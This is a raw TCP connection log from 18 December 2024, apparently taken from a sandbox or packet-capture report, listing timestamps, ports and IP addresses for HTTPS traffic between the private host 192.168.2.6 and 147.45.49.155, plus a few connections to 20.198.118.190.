                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.187299013 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.187325001 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.187341928 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.187383890 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.299098015 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.299179077 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.299243927 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.299243927 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.299263954 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.299304008 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.316006899 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.316035032 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.316083908 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.316095114 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.316189051 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.335200071 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.335328102 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.335330963 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.335366011 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.335412025 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.335412025 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.351557970 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.351598978 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.351696968 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.351696968 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.351713896 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.351867914 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.362536907 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.362571955 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.362668991 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.362668991 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.362687111 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.362859011 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.481126070 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.481156111 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.481226921 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.481245995 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.481302977 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.481302977 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.492417097 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.492441893 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.492569923 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.492569923 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.492582083 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.492640018 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.500888109 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.500947952 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.500992060 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.501002073 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.501040936 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.501040936 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.508563995 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.508616924 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.508641005 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.508657932 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.508702993 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.508702993 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.517311096 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.517364025 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.517453909 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.517453909 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.517465115 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.517565012 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.526073933 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.526102066 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.526161909 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.526170015 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.526211977 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.534183979 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.534203053 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.534286022 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.534295082 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.534431934 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.542630911 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.542649031 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.542699099 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.542710066 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.542757988 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.542757988 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.673881054 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.673904896 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.674196005 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.674220085 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.674271107 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.681132078 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.681149960 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.681232929 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.681243896 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.681391954 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.688752890 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.688767910 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.688879013 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.688889980 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.688968897 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.696486950 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.696510077 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.696582079 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.696599007 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.696737051 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.703747988 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.703764915 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.704055071 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.704066038 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.704118013 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.710783005 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.710803032 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.710880041 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.710890055 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.710967064 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.718425035 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.718440056 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.718529940 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.718539000 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.718583107 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.725531101 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.725548983 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.725636959 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.725646973 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.725739002 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.773114920 CET49754443192.168.2.620.198.118.190
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.773171902 CET4434975420.198.118.190192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.773340940 CET49754443192.168.2.620.198.118.190
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.773993969 CET49754443192.168.2.620.198.118.190
                                                                                                                                                                                                                  Dec 18, 2024 21:06:11.774009943 CET4434975420.198.118.190192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.053139925 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.053153992 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.053183079 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.053265095 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.053265095 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.053284883 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.053471088 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.178561926 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.178589106 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.178658009 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.178683043 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.178709030 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.178781986 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.185431957 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.185460091 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.185532093 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.185554028 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.185606956 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.185635090 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.192368984 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.192394018 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.192487001 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.192487001 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.192509890 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.195440054 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.198762894 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.198786974 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.198824883 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.198843956 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.198888063 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.198965073 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.207040071 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.207062960 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.207143068 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.207163095 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.207185030 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.207366943 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.213805914 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.213829041 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.213876009 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.213895082 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.213922024 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.213943958 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.219638109 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.219666004 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.219779968 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.219779968 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.219805002 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.219902039 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.285135031 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.285165071 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.285290956 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.285290956 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.285316944 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.287992954 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.292088985 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.292114019 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.292186975 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.292210102 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.292341948 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.295979023 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.297785044 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.297811031 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.297916889 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.297916889 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.297930956 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.302042961 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.305408955 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.305438042 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.305541992 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.305558920 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.305608034 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.312362909 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.312383890 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.312597990 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.312616110 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.312696934 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.319451094 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.319468975 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.319562912 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.319574118 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.319612026 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.330312014 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.330328941 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.330410957 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.330434084 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.330535889 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.332226038 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.335268974 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.335284948 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.335357904 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.335367918 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.335422039 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.395217896 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.395246029 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.395335913 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.395360947 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.395385027 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.395397902 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.402116060 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.402148008 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.402199984 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.402225018 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.402267933 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.402267933 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.412817001 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.412839890 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.412928104 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.412947893 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.412992001 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.419481993 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.419508934 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.419600010 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.419600010 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.419620037 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.419687033 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.426428080 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.426453114 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.426542997 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.426562071 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.426599979 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.426599979 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.433965921 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.433981895 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.434045076 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.434062958 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.434083939 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.434118986 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.440908909 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.440927029 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.440992117 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.441014051 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.441060066 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.447901011 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.447922945 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.447982073 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.448002100 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.448090076 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.511106968 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.511137009 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.511229992 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.511229992 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.511248112 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.511305094 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.518033981 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.518071890 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.518129110 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.518143892 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.518186092 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.518186092 CET49741443192.168.2.6147.45.49.155
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.524930000 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.524960041 CET44349741147.45.49.155192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:12.525048018 CET49741443192.168.2.6147.45.49.155
